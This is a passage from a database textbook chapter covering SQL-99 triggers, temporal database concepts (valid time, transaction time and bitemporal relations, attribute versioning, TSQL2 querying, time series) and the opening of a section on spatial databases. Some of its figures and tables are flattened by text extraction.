10If no order is specified between a pair of rules, the system default order is based on placing the rule
declared first ahead of the other rule.

940

Enhanced Data Models for Advanced Applications

Active rules can also be used to enforce integrity constraints by specifying the types
of events that may cause the constraints to be violated and then evaluating appro-
priate conditions that check whether the constraints are actually violated by the
event or not. Hence, complex application constraints, often known as business
rules, may be enforced that way. For example, in a UNIVERSITY database applica-
tion, one rule may monitor the GPA of students whenever a new grade is entered,
and it may alert the advisor if the GPA of a student falls below a certain threshold;
another rule may check that course prerequisites are satisfied before allowing a stu-
dent to enroll in a course; and so on.

Other applications include the automatic maintenance of derived data, such as the
examples of rules R1 through R4 that maintain the derived attribute Total_sal when-
ever individual employee tuples are changed. A similar application is to use active
rules to maintain the consistency of materialized views whenever the base relations
are modified. Alternately, an update operation specified on a view can be a trigger-
ing event, which can be converted to updates on the base relations by using an
instead of trigger. These applications are also relevant to the new data warehousing
technologies. A related application maintains that replicated tables are consistent
by specifying rules that modify the replicas whenever the master table is modified.

1.5 Triggers in SQL-99
Triggers in the SQL-99 and later standards are quite similar to the examples we dis-
cussed in Section 1.1, with some minor syntactic differences. The basic events that
can be specified for triggering the rules are the standard SQL update commands:
INSERT, DELETE, and UPDATE. In the case of UPDATE, one may specify the attributes
to be updated. Both row-level and statement-level triggers are allowed, indicated in
the trigger by the clauses FOR EACH ROW and FOR EACH STATEMENT, respectively.
One syntactic difference is that the trigger may specify particular tuple variable
names for the old and new tuples instead of using the keywords NEW and OLD, as
shown in Figure 1. Trigger T1 in Figure 6 shows how the row-level trigger R2 from
Figure 1(a) may be specified in SQL-99. Inside the REFERENCING clause, we
named tuple variables (aliases) O and N to refer to the OLD tuple (before modifica-
tion) and NEW tuple (after modification), respectively. Trigger T2 in Figure 6 shows
how the statement-level trigger R2S from Figure 5 may be specified in SQL-99. For
a statement-level trigger, the REFERENCING clause is used to refer to the table of all
new tuples (newly inserted or newly updated) as N, whereas the table of all old
tuples (deleted tuples or tuples before they were updated) is referred to as O.

2 Temporal Database Concepts
Temporal databases, in the broadest sense, encompass all database applications that
require some aspect of time when organizing their information. Hence, they
provide a good example to illustrate the need for developing a set of unifying con-
cepts for application developers to use. Temporal database applications have been

941

Enhanced Data Models for Advanced Applications

developed since the early days of database usage. However, in creating these applica-
tions, it is mainly left to the application designers and developers to discover, design,
program, and implement the temporal concepts they need. There are many exam-
ples of applications where some aspect of time is needed to maintain the informa-
tion in a database. These include healthcare, where patient histories need to be
maintained; insurance, where claims and accident histories are required as well as
information about the times when insurance policies are in effect; reservation sys-
tems in general (hotel, airline, car rental, train, and so on), where information on the
dates and times when reservations are in effect are required; scientific databases,
where data collected from experiments includes the time when each data is meas-
ured; and so on. Even the two examples used in this text may be easily expanded into
temporal applications. In the COMPANY database, we may wish to keep SALARY,
JOB, and PROJECT histories on each employee. In the UNIVERSITY database, time is
already included in the SEMESTER and YEAR of each SECTION of a COURSE, the
grade history of a STUDENT, and the information on research grants. In fact, it is
realistic to conclude that the majority of database applications have some temporal
information. However, users often attempt to simplify or ignore temporal aspects
because of the complexity that they add to their applications.

In this section, we will introduce some of the concepts that have been developed to
deal with the complexity of temporal database applications. Section 2.1 gives an
overview of how time is represented in databases, the different types of temporal

T1: CREATE TRIGGER Total_sal1
AFTER UPDATE OF Salary ON EMPLOYEE
REFERENCING OLD ROW AS O, NEW ROW AS N
FOR EACH ROW
WHEN ( N.Dno IS NOT NULL )
UPDATE DEPARTMENT
SET Total_sal = Total_sal + N.salary – O.salary
WHERE Dno = N.Dno;

T2: CREATE TRIGGER Total_sal2
AFTER UPDATE OF Salary ON EMPLOYEE
REFERENCING OLD TABLE AS O, NEW TABLE AS N
FOR EACH STATEMENT
WHEN EXISTS ( SELECT *FROM N WHERE N.Dno IS NOT NULL ) OR

EXISTS ( SELECT * FROM O WHERE O.Dno IS NOT NULL )
UPDATE DEPARTMENT AS D
SET D.Total_sal = D.Total_sal
+ ( SELECT SUM (N.Salary) FROM N WHERE D.Dno=N.Dno )
– ( SELECT SUM (O.Salary) FROM O WHERE D.Dno=O.Dno )
WHERE Dno IN ( ( SELECT Dno FROM N ) UNION ( SELECT Dno FROM O ) );

Figure 6
Trigger T1 illustrating
the syntax for defining
triggers in SQL-99.

942

Enhanced Data Models for Advanced Applications

information, and some of the different dimensions of time that may be needed.
Section 2.2 discusses how time can be incorporated into relational databases.
Section 2.3 gives some additional options for representing time that are possible in
database models that allow complex-structured objects, such as object databases.
Section 2.4 introduces operations for querying temporal databases, and gives a brief
overview of the TSQL2 language, which extends SQL with temporal concepts.
Section 2.5 focuses on time series data, which is a type of temporal data that is very
important in practice.

2.1 Time Representation, Calendars,
and Time Dimensions

For temporal databases, time is considered to be an ordered sequence of points in
some granularity that is determined by the application. For example, suppose that
some temporal application never requires time units that are less than one second.
Then, each time point represents one second using this granularity. In reality, each
second is a (short) time duration, not a point, since it may be further divided into
milliseconds, microseconds, and so on. Temporal database researchers have used the
term chronon instead of point to describe this minimal granularity for a particular
application. The main consequence of choosing a minimum granularity—say, one
second—is that events occurring within the same second will be considered to be
simultaneous events, even though in reality they may not be.

Because there is no known beginning or ending of time, one needs a reference point
from which to measure specific time points. Various calendars are used by various
cultures (such as Gregorian (western), Chinese, Islamic, Hindu, Jewish, Coptic, and
so on) with different reference points. A calendar organizes time into different time
units for convenience. Most calendars group 60 seconds into a minute, 60 minutes
into an hour, 24 hours into a day (based on the physical time of earth’s rotation
around its axis), and 7 days into a week. Further grouping of days into months and
months into years either follow solar or lunar natural phenomena, and are generally
irregular. In the Gregorian calendar, which is used in most western countries, days
are grouped into months that are 28, 29, 30, or 31 days, and 12 months are grouped
into a year. Complex formulas are used to map the different time units to one
another.

In SQL2, the temporal data types include DATE (specifying Year, Month, and Day as
YYYY-MM-DD), TIME (specifying Hour, Minute, and Second as HH:MM:SS),
TIMESTAMP (specifying a Date/Time combination, with options for including sub-
second divisions if they are needed), INTERVAL (a relative time duration, such as
10 days or 250 minutes), and PERIOD (an anchored time duration with a fixed start-
ing point, such as the 10-day period from January 1, 2009, to January 10, 2009,
inclusive).11

11Unfortunately, the terminology has not been used consistently. For example, the term interval is often
used to denote an anchored duration. For consistency, we will use the SQL terminology.

943

Enhanced Data Models for Advanced Applications

Event Information versus Duration (or State) Information. A temporal data-
base will store information concerning when certain events occur, or when certain
facts are considered to be true. There are several different types of temporal infor-
mation. Point events or facts are typically associated in the database with a single
time point in some granularity. For example, a bank deposit event may be associ-
ated with the timestamp when the deposit was made, or the total monthly sales of a
product (fact) may be associated with a particular month (say, February 2010). Note
that even though such events or facts may have different granularities, each is still
associated with a single time value in the database. This type of information is often
represented as time series data as we will discuss in Section 2.5. Duration events or
facts, on the other hand, are associated with a specific time period in the database.12

For example, an employee may have worked in a company from August 15, 2003
until November 20, 2008.

A time period is represented by its start and end time points [START-TIME, END-
TIME]. For example, the above period is represented as [2003-08-15, 2008-11-20].
Such a time period is often interpreted to mean the set of all time points from start-
time to end-time, inclusive, in the specified granularity. Hence, assuming day gran-
ularity, the period [2003-08-15, 2008-11-20] represents the set of all days from
August 15, 2003, until November 20, 2008, inclusive.13

Valid Time and Transaction Time Dimensions. Given a particular event or fact
that is associated with a particular time point or time period in the database, the
association may be interpreted to mean different things. The most natural interpre-
tation is that the associated time is the time that the event occurred, or the period
during which the fact was considered to be true in the real world. If this interpreta-
tion is used, the associated time is often referred to as the valid time. A temporal
database using this interpretation is called a valid time database.

However, a different interpretation can be used, where the associated time refers to
the time when the information was actually stored in the database; that is, it is the
value of the system time clock when the information is valid in the system.14 In this
case, the associated time is called the transaction time. A temporal database using
this interpretation is called a transaction time database.

Other interpretations can also be intended, but these are considered to be the most
common ones, and they are referred to as time dimensions. In some applications,
only one of the dimensions is needed and in other cases both time dimensions are
required, in which case the temporal database is called a bitemporal database. If

12This is the same as an anchored duration. It has also been frequently called a time interval, but to avoid
confusion we will use period to be consistent with SQL terminology.
13The representation [2003-08-15, 2008-11-20] is called a closed interval representation. One can also
use an open interval, denoted [2003-08-15, 2008-11-21), where the set of points does not include the
end point. Although the latter representation is sometimes more convenient, we shall use closed intervals
except where indicated.
14The explanation is more involved, as we will see in Section 2.3.

944

Enhanced Data Models for Advanced Applications

(a)

Name

EMP_VT

Salary DnoSsn Supervisor_ssn Vst Vet

Name Salary Supervisor_ssnSsn Tst Tet

(b)

(c)

Dname

DEPT_VT

EMP_TT

Dname Total_sal Manager_ssnDno

Dno

Tst Tet

DEPT_TT

Total_salDno Manager_ssn Vst Vet

Name Salary Supervisor_ssnSsn Dno Tst Tet

EMP_BT

Dname Total_sal Manager_ssnDno Tst Tet

DEPT_BT

Vst Vet

Vst Vet

Figure 7
Different types of temporal
relational databases. (a) Valid
time database schema. (b)
Transaction time database
schema. (c) Bitemporal data-
base schema.

other interpretations are intended for time, the user can define the semantics and
program the applications appropriately, and it is called a user-defined time.

The next section shows how these concepts can be incorporated into relational
databases, and Section 2.3 shows an approach to incorporate temporal concepts
into object databases.

2.2 Incorporating Time in Relational Databases
Using Tuple Versioning

Valid Time Relations. Let us now see how the different types of temporal data-
bases may be represented in the relational model. First, suppose that we would like
to include the history of changes as they occur in the real world. Consider again the
database in Figure 1, and let us assume that, for this application, the granularity is
day. Then, we could convert the two relations EMPLOYEE and DEPARTMENT into
valid time relations by adding the attributes Vst (Valid Start Time) and Vet (Valid
End Time), whose data type is DATE in order to provide day granularity. This is
shown in Figure 7(a), where the relations have been renamed EMP_VT and
DEPT_VT, respectively.

Consider how the EMP_VT relation differs from the nontemporal EMPLOYEE rela-
tion (Figure 1).15 In EMP_VT, each tuple V represents a version of an employee’s

15A nontemporal relation is also called a snapshot relation because it shows only the current snapshot
or current state of the database.

945

Enhanced Data Models for Advanced Applications

Name

Smith 123456789 25000 5 333445555 2002-06-15 2003-05-31

Smith 123456789 30000 5 333445555 2003-06-01 Now

333445555 25000 4 999887777 1999-08-20 2001-01-31

333445555 30000 5 999887777 2001-02-01 2002-03-31

333445555 40000 5 888665555 2002-04-01 Now

222447777 28000 4 999887777 2001-05-01 2002-08-10

666884444 38000 5 333445555 2003-08-01 Now

Wong

Wong

Wong

Brown

Narayan

. . .

. . .

EMP_VT

Ssn Salary Dno Supervisor_ssn Vst Vet

Dname

Research

Research

DEPT_VT

5 888665555 2002-03-312001-09-20

333445555 2002-04-015 Now

Dno Manager_ssn Vst Vet

Figure 8
Some tuple versions in the valid time relations EMP_VT and DEPT_VT.

information that is valid (in the real world) only during the time period [V.Vst, V.Vet],
whereas in EMPLOYEE each tuple represents only the current state or current ver-
sion of each employee. In EMP_VT, the current version of each employee typically
has a special value, now, as its valid end time. This special value, now, is a temporal
variable that implicitly represents the current time as time progresses. The nontem-
poral EMPLOYEE relation would only include those tuples from the EMP_VT rela-
tion whose Vet is now.

Figure 8 shows a few tuple versions in the valid-time relations EMP_VT and
DEPT_VT. There are two versions of Smith, three versions of Wong, one version of
Brown, and one version of Narayan. We can now see how a valid time relation
should behave when information is changed. Whenever one or more attributes of
an employee are updated, rather than actually overwriting the old values, as would
happen in a nontemporal relation, the system should create a new version and close
the current version by changing its Vet to the end time. Hence, when the user issued
the command to update the salary of Smith effective on June 1, 2003, to $30000,
the second version of Smith was created (see Figure 8). At the time of this update,
the first version of Smith was the current version, with now as its Vet, but after the
update now was changed to May 31, 2003 (one less than June 1, 2003, in day granu-
larity), to indicate that the version has become a closed or history version and that
the new (second) version of Smith is now the current one.

946

Enhanced Data Models for Advanced Applications

It is important to note that in a valid time relation, the user must generally provide
the valid time of an update. For example, the salary update of Smith may have been
entered in the database on May 15, 2003, at 8:52:12 A.M., say, even though the salary
change in the real world is effective on June 1, 2003. This is called a proactive
update, since it is applied to the database before it becomes effective in the real
world. If the update is applied to the database after it becomes effective in the real
world, it is called a retroactive update. An update that is applied at the same time as
it becomes effective is called a simultaneous update.

The action that corresponds to deleting an employee in a nontemporal database
would typically be applied to a valid time database by closing the current version of
the employee being deleted. For example, if Smith leaves the company effective
January 19, 2004, then this would be applied by changing Vet of the current version
of Smith from now to 2004-01-19. In Figure 8, there is no current version for
Brown, because he presumably left the company on 2002-08-10 and was logically
deleted. However, because the database is temporal, the old information on Brown is
still there.

The operation to insert a new employee would correspond to creating the first tuple
version for that employee, and making it the current version, with the Vst being the
effective (real world) time when the employee starts work. In Figure 7, the tuple on
Narayan illustrates this, since the first version has not been updated yet.

Notice that in a valid time relation, the nontemporal key, such as Ssn in EMPLOYEE,
is no longer unique in each tuple (version). The new relation key for EMP_VT is a
combination of the nontemporal key and the valid start time attribute Vst,16 so we
use (Ssn, Vst) as primary key. This is because, at any point in time, there should be at
most one valid version of each entity. Hence, the constraint that any two tuple ver-
sions representing the same entity should have nonintersecting valid time periods
should hold on valid time relations. Notice that if the nontemporal primary key
value may change over time, it is important to have a unique surrogate key attrib-
ute, whose value never changes for each real-world entity, in order to relate all ver-
sions of the same real-world entity.

Valid time relations basically keep track of the history of changes as they become
effective in the real world. Hence, if all real-world changes are applied, the database
keeps a history of the real-world states that are represented. However, because
updates, insertions, and deletions may be applied retroactively or proactively, there is
no record of the actual database state at any point in time. If the actual database states
are important to an application, then one should use transaction time relations.

Transaction Time Relations. In a transaction time database, whenever a change
is applied to the database, the actual timestamp of the transaction that applied the
change (insert, delete, or update) is recorded. Such a database is most useful when
changes are applied simultaneously in the majority of cases—for example, real-time
stock trading or banking transactions. If we convert the nontemporal database in

16A combination of the nontemporal key and the valid end time attribute Vet could also be used.

947

Enhanced Data Models for Advanced Applications

Figure 1 into a transaction time database, then the two relations EMPLOYEE and
DEPARTMENT are converted into transaction time relations by adding the attrib-
utes Tst (Transaction Start Time) and Tet (Transaction End Time), whose data type
is typically TIMESTAMP. This is shown in Figure 7(b), where the relations have been
renamed EMP_TT and DEPT_TT, respectively.

In EMP_TT, each tuple V represents a version of an employee’s information that was
created at actual time V.Tst and was (logically) removed at actual time V.Tet
(because the information was no longer correct). In EMP_TT, the current version of
each employee typically has a special value, uc (Until Changed), as its transaction
end time, which indicates that the tuple represents correct information until it is
changed by some other transaction.17 A transaction time database has also been
called a rollback database,18 because a user can logically roll back to the actual
database state at any past point in time T by retrieving all tuple versions V whose
transaction time period [V.Tst, V.Tet] includes time point T.

Bitemporal Relations. Some applications require both valid time and transac-
tion time, leading to bitemporal relations. In our example, Figure 7(c) shows how
the EMPLOYEE and DEPARTMENT nontemporal relations in Figure 1 would appear
as bitemporal relations EMP_BT and DEPT_BT, respectively. Figure 9 shows a few
tuples in these relations. In these tables, tuples whose transaction end time Tet is uc
are the ones representing currently valid information, whereas tuples whose Tet is an
absolute timestamp are tuples that were valid until (just before) that timestamp.
Hence, the tuples with uc in Figure 9 correspond to the valid time tuples in Figure 7.
The transaction start time attribute Tst in each tuple is the timestamp of the trans-
action that created that tuple.

Now consider how an update operation would be implemented on a bitemporal
relation. In this model of bitemporal databases,19 no attributes are physically
changed in any tuple except for the transaction end time attribute Tet with a value of
uc.20 To illustrate how tuples are created, consider the EMP_BT relation. The current
version V of an employee has uc in its Tet attribute and now in its Vet attribute. If
some attribute—say, Salary—is updated, then the transaction T that performs the
update should have two parameters: the new value of Salary and the valid time VT
when the new salary becomes effective (in the real world). Assume that VT− is the

17The uc variable in transaction time relations corresponds to the now variable in valid time relations. The
semantics are slightly different though.
18Here, the term rollback does not have the same meaning as transaction rollback during recovery, where
the transaction updates are physically undone. Rather, here the updates can be logically undone, allowing
the user to examine the database as it appeared at a previous time point.
19There have been many proposed temporal database models. We describe specific models here as
examples to illustrate the concepts.
20Some bitemporal models allow the Vet attribute to be changed also, but the interpretations of the
tuples are different in those models.

948

Enhanced Data Models for Advanced Applications

Name

Smith 123456789 25000 5 333445555 2002-06-15

Smith 123456789 25000 5 333445555 2002-06-15

123456789 30000 5 333445555 2003-06-01

333445555 25000 4 999887777 1999-08-20

333445555 25000 4 999887777 1999-08-20

333445555 30000 5 999887777 2001-02-01

333445555 30000 5

5

4

4

5

999887777

888667777

999887777

999887777

333445555

2001-02-01

2002-04-01

2001-05-01

2001-05-01

2003-08-01

2002-06-08, 13:05:58

2003-06-04, 08:56:12

2003-06-04, 08:56:12

1999-08-20, 11:18:23

2001-01-07, 14:33:02

2001-01-07, 14:33:02

2002-03-28, 09:23:57

2002-03-28, 09:23:57

2001-04-27, 16:22:05

2002-08-12, 10:11:07

2003-07-28, 09:25:37

2003-06-04,08:56:12

uc

uc

2001-01-07,14:33:02

uc

2002-03-28,09:23:57

uc

uc

2002-08-12,10:11:07

uc

uc

Now

2003-05-31

Now

Now

2001-01-31

Now

2002-03-31

Now

Now

2002-08-10

Now

Smith

Wong

Wong

Wong

Wong

Wong 333445555

Brown 222447777

Brown 222447777

Narayan

. . .

40000

28000

28000

38000666884444

EMP_BT

Ssn Salary Dno Supervisor_ssn Vst Vet Tst Tet

Dname

Research

Research

DEPT_VT

5 888665555 Now2001-09-20

888665555 2001-09-205 1997-03-31

Dno Manager_ssn Vst Vet

2001-09-15,14:52:12

2002-03-28,09:23:57

Tst

2001-03-28,09:23:57

uc

Research 333445555 2002-04-015 Now 2002-03-28,09:23:57 uc

Tet

Figure 9
Some tuple versions in the bitemporal relations EMP_BT and DEPT_BT.

time point before VT in the given valid time granularity and that transaction T has a
timestamp TS(T). Then, the following physical changes would be applied to the
EMP_BT table:

1. Make a copy V2 of the current version V; set V2.Vet to VT−, V2.Tst to TS(T),
V2.Tet to uc, and insert V2 in EMP_BT; V2 is a copy of the previous current
version V after it is closed at valid time VT−.

2. Make a copy V3 of the current version V; set V3.Vst to VT, V3.Vet to now,
V3.Salary to the new salary value, V3.Tst to TS(T), V3.Tet to uc, and insert V3 in
EMP_BT; V3 represents the new current version.

3. Set V.Tet to TS(T) since the current version is no longer representing correct
information.

As an illustration, consider the first three tuples V1, V2, and V3 in EMP_BT in Figure
9. Before the update of Smith’s salary from 25000 to 30000, only V1 was in EMP_BT
and it was the current version and its Tet was uc. Then, a transaction T whose time-
stamp TS(T) is ‘2003-06-04,08:56:12’ updates the salary to 30000 with the effective
valid time of ‘2003-06-01’. The tuple V2 is created, which is a copy of V1 except that
its Vet is set to ‘2003-05-31’, one day less than the new valid time and
its Tst is the timestamp of the updating transaction. The tuple V3 is also created,
which has the new salary, its Vst is set to ‘2003-06-01’, and its Tst is also the time-
stamp of the updating transaction. Finally, the Tet of V1 is set to the timestamp of

949

Enhanced Data Models for Advanced Applications

the updating transaction, ‘2003-06-04,08:56:12’. Note that this is a retroactive
update, since the updating transaction ran on June 4, 2003, but the salary change is
effective on June 1, 2003.

Similarly, when Wong’s salary and department are updated (at the same time) to
30000 and 5, the updating transaction’s timestamp is ‘2001-01-07,14:33:02’ and the
effective valid time for the update is ‘2001-02-01’. Hence, this is a proactive update
because the transaction ran on January 7, 2001, but the effective date was February
1, 2001. In this case, tuple V4 is logically replaced by V5 and V6.

Next, let us illustrate how a delete operation would be implemented on a bitempo-
ral relation by considering the tuples V9 and V10 in the EMP_BT relation of Figure 9.
Here, employee Brown left the company effective August 10, 2002, and the logical
delete is carried out by a transaction T with TS(T) = 2002-08-12,10:11:07. Before
this, V9 was the current version of Brown, and its Tet was uc. The logical delete is
implemented by setting V9.Tet to 2002-08-12,10:11:07 to invalidate it, and creating
the final version V10 for Brown, with its Vet = 2002-08-10 (see Figure 9). Finally, an
insert operation is implemented by creating the first version as illustrated by V11 in
the EMP_BT table.

Implementation Considerations. There are various options for storing the
tuples in a temporal relation. One is to store all the tuples in the same table, as
shown in Figures 8 and 9. Another option is to create two tables: one for the cur-
rently valid information and the other for the rest of the tuples. For example, in the
bitemporal EMP_BT relation, tuples with uc for their Tet and now for their Vet would
be in one relation, the current table, since they are the ones currently valid (that is,
represent the current snapshot), and all other tuples would be in another relation.
This allows the database administrator to have different access paths, such as
indexes for each relation, and keeps the size of the current table reasonable. Another
possibility is to create a third table for corrected tuples whose Tet is not uc.

Another option that is available is to vertically partition the attributes of the tempo-
ral relation into separate relations so that if a relation has many attributes, a whole
new tuple version is created whenever any one of the attributes is updated. If the
attributes are updated asynchronously, each new version may differ in only one of
the attributes, thus needlessly repeating the other attribute values. If a separate rela-
tion is created to contain only the attributes that always change synchronously, with
the primary key replicated in each relation, the database is said to be in temporal
normal form. However, to combine the information, a variation of join known
as temporal intersection join would be needed, which is generally expensive to
implement.

It is important to note that bitemporal databases allow a complete record of
changes. Even a record of corrections is possible. For example, it is possible that two
tuple versions of the same employee may have the same valid time but different
attribute values as long as their transaction times are disjoint. In this case, the tuple
with the later transaction time is a correction of the other tuple version. Even incor-
rectly entered valid times may be corrected this way. The incorrect state of the data-

950

Enhanced Data Models for Advanced Applications

base will still be available as a previous database state for querying purposes. A data-
base that keeps such a complete record of changes and corrections is sometimes
called an append-only database.

2.3 Incorporating Time in Object-Oriented Databases
Using Attribute Versioning

The previous section discussed the tuple versioning approach to implementing
temporal databases. In this approach, whenever one attribute value is changed, a
whole new tuple version is created, even though all the other attribute values will
be identical to the previous tuple version. An alternative approach can be used in
database systems that support complex structured objects, such as object data-
bases or object-relational systems. This approach is called attribute versioning.

In attribute versioning, a single complex object is used to store all the temporal
changes of the object. Each attribute that changes over time is called a time-varying
attribute, and it has its values versioned over time by adding temporal periods to
the attribute. The temporal periods may represent valid time, transaction time, or
bitemporal, depending on the application requirements. Attributes that do not
change over time are called nontime-varying and are not associated with the tem-
poral periods. To illustrate this, consider the example in Figure 10, which is an
attribute-versioned valid time representation of EMPLOYEE using the object defini-
tion language (ODL) notation for object databases. Here, we assumed that name
and Social Security number are nontime-varying attributes, whereas salary, depart-
ment, and supervisor are time-varying attributes (they may change over time). Each
time-varying attribute is represented as a list of tuples , ordered by valid start time.

Whenever an attribute is changed in this model, the current attribute version is
closed and a new attribute version for this attribute only is appended to the list.
This allows attributes to change asynchronously. The current value for each attrib-
ute has now for its Valid_end_time. When using attribute versioning, it is useful to
include a lifespan temporal attribute associated with the whole object whose value
is one or more valid time periods that indicate the valid time of existence for the
whole object. Logical deletion of the object is implemented by closing the lifespan.
The constraint that any time period of an attribute within an object should be a
subset of the object’s lifespan should be enforced.

For bitemporal databases, each attribute version would have a tuple with five com-
ponents:

The object lifespan would also include both valid and transaction time dimensions.
Therefore, the full capabilities of bitemporal databases can be available with attrib-
ute versioning. Mechanisms similar to those discussed earlier for updating tuple
versions can be applied to updating attribute versions.

951

Enhanced Data Models for Advanced Applications

class TEMPORAL_SALARY
{ attribute Date Valid_start_time;

attribute Date Valid_end_time;
attribute float Salary;

};

class TEMPORAL_DEPT
{ attribute Date Valid_start_time;

attribute Date Valid_end_time;
attribute DEPARTMENT_VT Dept;

};

class TEMPORAL_SUPERVISOR
{ attribute Date Valid_start_time;

attribute Date Valid_end_time;
attribute EMPLOYEE_VT Supervisor;

};

class TEMPORAL_LIFESPAN
{ attribute Date Valid_ start time;

attribute Date Valid end time;
};

class EMPLOYEE_VT
( extent EMPLOYEES )
{ attribute list lifespan;

attribute string Name;
attribute string Ssn;
attribute list Sal_history;
attribute list Dept_history;
attribute list Supervisor_history;

};

Figure 10
Possible ODL schema for a temporal valid time EMPLOYEE_VT
object class using attribute versioning.

2.4 Temporal Querying Constructs
and the TSQL2 Language

So far, we have discussed how data models may be extended with temporal con-
structs. Now we give a brief overview of how query operations need to be extended
for temporal querying. We will briefly discuss the TSQL2 language, which extends
SQL for querying valid time, transaction time, and bitemporal relational databases.

In nontemporal relational databases, the typical selection conditions involve attrib-
ute conditions, and tuples that satisfy these conditions are selected from the set of

952

Enhanced Data Models for Advanced Applications

current tuples. Following that, the attributes of interest to the query are specified by
a projection operation. For example, in the query to retrieve the names of all employ-
ees working in department 5 whose salary is greater than 30000, the selection condi-
tion would be as follows:

((Salary > 30000) AND (Dno = 5))

The projected attribute would be Name. In a temporal database, the conditions may
involve time in addition to attributes. A pure time condition involves only time—
for example, to select all employee tuple versions that were valid on a certain time
point T or that were valid during a certain time period [T1, T2]. In this case, the spec-
ified time period is compared with the valid time period of each tuple version [T.Vst,
T.Vet], and only those tuples that satisfy the condition are selected. In these opera-
tions, a period is considered to be equivalent to the set of time points from T1 to T2
inclusive, so the standard set comparison operations can be used. Additional opera-
tions, such as whether one time period ends before another starts are also needed.21

Some of the more common operations used in queries are as follows:

[T.Vst, T.Vet] INCLUDES [T1, T2] Equivalent to T1 ≥ T.Vst AND T2 ≤ T.Vet
[T.Vst, T.Vet] INCLUDED_IN [T1, T2] Equivalent to T1 ≤ T.Vst AND T2 ≥ T.Vet
[T.Vst, T.Vet] OVERLAPS [T1, T2] Equivalent to (T1 ≤ T.Vet AND T2 ≥ T.Vst)

22

[T.Vst, T.Vet] BEFORE [T1, T2] Equivalent to T1 ≥ T.Vet
[T.Vst, T.Vet] AFTER [T1, T2] Equivalent to T2 ≤ T.Vst
[T.Vst, T.Vet] MEETS_BEFORE [T1, T2] Equivalent to T1 = T.Vet + 1

23

[T.Vst, T.Vet] MEETS_AFTER [T1, T2] Equivalent to T2 + 1 = T.Vst

Additionally, operations are needed to manipulate time periods, such as computing
the union or intersection of two time periods. The results of these operations may
not themselves be periods, but rather temporal elements—a collection of one or
more disjoint time periods such that no two time periods in a temporal element are
directly adjacent. That is, for any two time periods [T1, T2] and [T3, T4] in a temporal
element, the following three conditions must hold:

■ [T1, T2] intersection [T3, T4] is empty.

■ T3 is not the time point following T2 in the given granularity.

■ T1 is not the time point following T4 in the given granularity.

The latter conditions are necessary to ensure unique representations of temporal
elements. If two time periods [T1, T2] and [T3, T4] are adjacent, they are combined

21A complete set of operations, known as Allen’s algebra (Allen, 1983), has been defined for compar-
ing time periods.
22This operation returns true if the intersection of the two periods is not empty; it has also been called
INTERSECTS_WITH.
23Here, 1 refers to one time point in the specified granularity. The MEETS operations basically specify if
one period starts immediately after another period ends.

953

Enhanced Data Models for Advanced Applications

into a single time period [T1, T4]. This is called coalescing of time periods.
Coalescing also combines intersecting time periods.

To illustrate how pure time conditions can be used, suppose a user wants to select all
employee versions that were valid at any point during 2002. The appropriate selec-
tion condition applied to the relation in Figure 8 would be

[T.Vst, T.Vet] OVERLAPS [2002-01-01, 2002-12-31]

Typically, most temporal selections are applied to the valid time dimension. For a
bitemporal database, one usually applies the conditions to the currently correct
tuples with uc as their transaction end times. However, if the query needs to be
applied to a previous database state, an AS_OF T clause is appended to the query,
which means that the query is applied to the valid time tuples that were correct in
the database at time T.

In addition to pure time conditions, other selections involve attribute and time
conditions. For example, suppose we wish to retrieve all EMP_VT tuple versions T
for employees who worked in department 5 at any time during 2002. In this case,
the condition is

[T.Vst, T.Vet]OVERLAPS [2002-01-01, 2002-12-31] AND (T.Dno = 5)

Finally, we give a brief overview of the TSQL2 query language, which extends SQL
with constructs for temporal databases. The main idea behind TSQL2 is to allow
users to specify whether a relation is nontemporal (that is, a standard SQL relation)
or temporal. The CREATE TABLE statement is extended with an optional AS clause to
allow users to declare different temporal options. The following options are avail-
able:

(valid time relation with valid time
period)

(valid time relation with valid time
point)

AND TRANSACTION (bitemporal rela-
tion, valid time period)

AND TRANSACTION (bitemporal rela-
tion, valid time point)

The keywords STATE and EVENT are used to specify whether a time period or time
point is associated with the valid time dimension. In TSQL2, rather than have the
user actually see how the temporal tables are implemented (as we discussed in the
previous sections), the TSQL2 language adds query language constructs to specify
various types of temporal selections, temporal projections, temporal aggregations,
transformation among granularities, and many other concepts. The book by
Snodgrass et al. (1995) describes the language.

954

Enhanced Data Models for Advanced Applications

2.5 Time Series Data
Time series data is used very often in financial, sales, and economics applications.
They involve data values that are recorded according to a specific predefined
sequence of time points. Therefore, they are a special type of valid event data, where
the event time points are predetermined according to a fixed calendar. Consider the
example of closing daily stock prices of a particular company on the New York Stock
Exchange. The granularity here is day, but the days that the stock market is open are
known (nonholiday weekdays). Hence, it has been common to specify a computa-
tional procedure that calculates the particular calendar associated with a time
series. Typical queries on time series involve temporal aggregation over higher
granularity intervals—for example, finding the average or maximum weekly closing
stock price or the maximum and minimum monthly closing stock price from the
daily information.

As another example, consider the daily sales dollar amount at each store of a chain
of stores owned by a particular company. Again, typical temporal aggregates would
be retrieving the weekly, monthly, or yearly sales from the daily sales information
(using the sum aggregate function), or comparing same store monthly sales with
previous monthly sales, and so on.

Because of the specialized nature of time series data and the lack of support for it in
older DBMSs, it has been common to use specialized time series management sys-
tems rather than general-purpose DBMSs for managing such information. In such
systems, it has been common to store time series values in sequential order in a file,
and apply specialized time series procedures to analyze the information. The prob-
lem with this approach is that the full power of high-level querying in languages
such as SQL will not be available in such systems.

More recently, some commercial DBMS packages are offering time series exten-
sions, such as the Oracle time cartridge and the time series data blade of Informix
Universal Server. In addition, the TSQL2 language provides some support for time
series in the form of event tables.

3 Spatial Database Concepts24

3.1 Introduction to Spatial Databases
Spatial databases incorporate functionality that provides support for databases that
keep track of objects in a multidimensional space. For example, cartographic data-
bases that store maps include two-dimensional spatial descriptions of their
objects—from countries and states to rivers, cities, roads, seas, and so on. The sys-
tems that manage geographic data and related applications are known as

24The contribution of Pranesh Parimala Ranganathan to this section is appreciated.

955

Enhanced Data Models for Advanced Applications

Table 1 Common Types of Analysis for Spatial Data

Analysis Type Type of Operations and Measurements

Measurements Distance, perimeter, shape, adjacency, and direction

Spatial analysis/statistics Pattern, autocorrelation, and indexes of similarity and topology using
spatial and nonspatial data

Flow analysis Connectivity and shortest path

Location analysis Analysis of points and lines within a polygon

Terrain analysis Slope/aspect, catchment area, drainage network

Search Thematic search, search by region

Geographical Information Systems (GIS), and they are used in areas such as envi-
ronmental applications, transportation systems, emergency response systems, and
battle management. Other databases, such as meteorological databases for weather
information, are three-dimensional, since temperatures and other meteorological
information are related to three-dimensional spatial points. In general, a spatial
database stores objects that have spatial characteristics that describe them and that
have spatial relationships among them. The spatial relationships among the objects
are important, and they are often needed when querying the database. Although a
